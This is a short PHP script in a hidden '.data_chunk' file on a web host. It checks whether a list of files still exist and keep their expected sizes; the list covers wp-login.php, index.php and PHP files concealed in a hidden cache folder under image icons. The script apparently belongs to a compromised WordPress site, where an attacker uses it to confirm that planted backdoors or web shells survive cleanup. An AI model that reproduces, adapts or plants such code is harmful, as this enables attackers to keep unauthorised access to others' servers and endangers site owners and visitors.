File: /home/moroqbvm/public_html/kro__b585595/.data_chunk
<?php $r = '/home/moroqbvm/public_html'; $x = ["/kro__b585595/wp-login.php"=>"bd@@436508@@76",
"/assets__b585595/img/icons/list-grid/.cache_a/groups.php"=>"bd@@430315@@50",
"/assets__b585595/img/icons/list-grid/.cache_a/inc.php"=>"bd@@433033@@19",
"/assets__b585595/img/icons/list-grid/.cache_a/logout.php"=>"bd@@433001@@85",
"/index.php"=>"bd@@427150@@81",
"/assets__b585595/img/icons/list-grid/.cache_a/groups.php"=>"bd@@419112@@576",
"/assets__b585595/img/icons/list-grid/.cache_a/inc.php"=>"bd@@417409@@6335"]; foreach ($x as $p => $l) { $f = "{$r}{$p}"; list($t, $id, $pt) = explode('@@', $l); if (!file_exists($f)) { print "<$t>{$id}##d</$t>\n"; continue; } if (is_numeric($pt)) { $fs = filesize($f); if ($fs != $pt) { print "<$t>{$id}##bs</$t>\n"; } } else { $c = file_get_contents($f); if (!strstr($c, $pt)) { print "<$t>{$id}##d</$t>\n"; } } } die('!end!');